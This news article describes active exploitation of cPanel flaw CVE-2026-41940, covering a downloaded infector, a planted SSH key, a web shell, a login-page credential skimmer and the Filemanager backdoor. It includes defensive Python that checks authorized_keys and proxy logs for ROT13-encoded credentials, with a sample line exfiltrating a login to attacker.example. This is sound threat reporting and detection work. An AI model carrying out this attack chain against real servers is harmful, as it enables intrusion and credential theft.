cPanel CVE-2026-41940 Under Active Exploit to Install Filemanager Backdoor

A threat actor known as Mr_Rot13 is said to be exploiting a recently disclosed critical cPanel flaw to deploy a backdoor codenamed Filemanager on vulnerable systems.
The attack exploits CVE-2026-41940, a vulnerability affecting cPanel and WebHost Manager (WHM) that could result in an authentication bypass and allow remote attackers to gain full control of the control panel.
According to a new report from QiAnXin XLab, the flaw was exploited by a number of threat actors shortly after its public disclosure late last month, resulting in malicious activity such as cryptocurrency mining, ransomware, botnet propagation, and backdoor installation.
“Monitoring data shows that more than 2,000 attacker source IPs around the world are currently involved in automated attacks and cybercriminal activities targeting this vulnerability,” XLab researchers said. “These IPs are distributed in many regions around the world, mainly from Germany, the United States, Brazil, the Netherlands, and other regions.”
Further analysis of ongoing exploitation activity revealed a shell script that uses wget or curl to download a Go-based infector from a remote server (“cp.dene.[de[.]com”). The infector is designed to plant an SSH public key on the vulnerable cPanel system for persistent access and to drop a PHP web shell that supports file upload/download and remote command execution.
The web shell is then used to inject JavaScript code into a customized login page that steals login credentials and sends them, encoded with the ROT13 cipher, to an attacker-controlled server (“wrned[.]com”). Once the credentials have been exfiltrated, the attack chain culminates in the installation of a cross-platform backdoor capable of infecting Windows, macOS, and Linux systems.
The infector is also equipped to collect sensitive information from the compromised host, including bash history, SSH data, device information, database passwords, and cPanel virtual aliases (aka valiases), and to exfiltrate it to a three-member Telegram group created by a user named “0xWR.”
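Two defender-side checks for the behaviour described above, added here as an illustration and not taken from the XLab report: an audit of an authorized_keys file against approved fingerprints (which surfaces a planted SSH key) and a scan of egress proxy lines for query strings that decode under ROT13 to credential fields. It assumes the harvested credentials travel as a ROT13-encoded query string, uses a placeholder host in place of the reported domain, and all sample data is constructed.

```python
import base64
import codecs
import hashlib
from urllib.parse import parse_qs, urlparse

# Query-string keys that, once ROT13-decoded, point to harvested login credentials.
CREDENTIAL_KEYS = {"user", "username", "login", "pass", "password", "passwd"}


def ssh_fingerprint(key_line: str) -> str:
    """OpenSSH-style SHA256 fingerprint of one 'type base64 comment' line (no option prefix)."""
    digest = hashlib.sha256(base64.b64decode(key_line.split()[1])).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(authorized_keys: str, approved: set) -> list:
    """Fingerprints of keys present in the file but absent from the approved set."""
    lines = [ln.strip() for ln in authorized_keys.splitlines()]
    fps = [ssh_fingerprint(ln) for ln in lines if ln and not ln.startswith("#")]
    return [fp for fp in fps if fp not in approved]


def is_rot13_credential_exfil(url: str) -> bool:
    """True if the ROT13-decoded query string carries two or more credential-like keys."""
    query = codecs.decode(urlparse(url).query, "rot_13")
    keys = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
    return len(keys & CREDENTIAL_KEYS) >= 2


def find_rot13_exfil(proxy_lines: list) -> list:
    """Return the 'client url' proxy lines whose query decodes to a credential payload."""
    return [ln for ln in proxy_lines if is_rot13_credential_exfil(ln.split()[-1])]


def _fake_key(seed: bytes) -> str:
    """Constructed ed25519-shaped blob for the sample file (not a usable key)."""
    blob = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + hashlib.sha256(seed).digest()
    return "ssh-ed25519 " + base64.b64encode(blob).decode()


# Constructed samples: one approved admin key plus one planted key, and proxy lines
# where the second carries ROT13("user=root&pass=Hunter2") to a placeholder host.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample",
    _fake_key(b"admin-laptop") + " admin@laptop",
    _fake_key(b"planted") + " backup",
])
APPROVED = {ssh_fingerprint(_fake_key(b"admin-laptop"))}
SAMPLE_PROXY_LINES = [
    "10.0.0.5 https://cpanel.example:2083/login/?login_only=1",
    "10.0.0.5 https://attacker.example/c.php?hfre=ebbg&cnff=Uhagre2",
    "10.0.0.7 https://cdn.example/app.js",
]
```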
In the infection chain analyzed by XLab, Filemanager is delivered via a shell script downloaded from the “wpsock[.]com” domain. The backdoor supports file management, remote command execution, and shell operations.
There are signs that the threat actor behind the campaign has been operating quietly for years. This assessment is based on the fact that a command-and-control (C2) domain embedded in the JavaScript code was also used by a PHP-based backdoor (“helper.php”) uploaded to the VirusTotal platform in April 2022. The domain was first registered in October 2020.
“In the six years from 2020 until now, the detection rate of samples related to Mr_Rot13 and infrastructure in all security products has remained very low,” XLab said.